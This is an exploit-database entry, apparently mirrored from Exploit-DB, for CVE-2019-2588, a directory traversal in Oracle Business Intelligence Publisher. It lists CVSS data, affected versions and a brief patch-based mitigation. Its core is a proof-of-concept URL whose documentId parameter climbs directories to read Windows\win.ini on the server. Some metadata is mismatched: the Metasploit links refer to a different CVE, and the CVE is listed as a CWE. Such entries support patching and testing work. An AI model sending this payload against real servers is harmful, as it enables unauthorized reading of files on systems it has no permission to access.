header-logo
Suggest Exploit
vendor:
Oracle Business Intelligence
by:
@vah_13
4.9
CVSS
MEDIUM
Directory Traversal
22
CWE
Product Name: Oracle Business Intelligence
Affected Version From: 11.1.1.9.0
Affected Version To: 12.2.1.4.0
Patch Exists: NO
Related CWE: CVE-2019-2588
CPE: a:oracle:business_intelligence:11.1.1.9.0
Metasploit: https://www.rapid7.com/db/vulnerabilities/rocky_linux-cve-2019-3881/https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2019-3881/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2019-3881/
Other Scripts:
Tags: cve,cve2019,oracle,lfi
CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Nuclei References: http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.htmlhttps://nvd.nist.gov/vuln/detail/CVE-2019-2588
Nuclei Metadata: {'max-request': 1, 'vendor': 'oracle', 'product': 'business_intelligence_publisher'}
Platforms Tested: Windows
2019

Directory traversal in Oracle Business Intelligence

The exploit allows an attacker to traverse through directories and access files outside the intended directory.

Mitigation:

Apply the latest patch provided by Oracle to fix the vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Directory traversal in Oracle Business Intelligence
# Date: 16.04.19
# Exploit Author: @vah_13
# Vendor Homepage: http://oracle.com
# Software Link:
https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
# Tested on: Windows
# CVE : CVE-2019-2588

PoC

http://server:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini

Navigation

Suggest Exploit

Services By CQR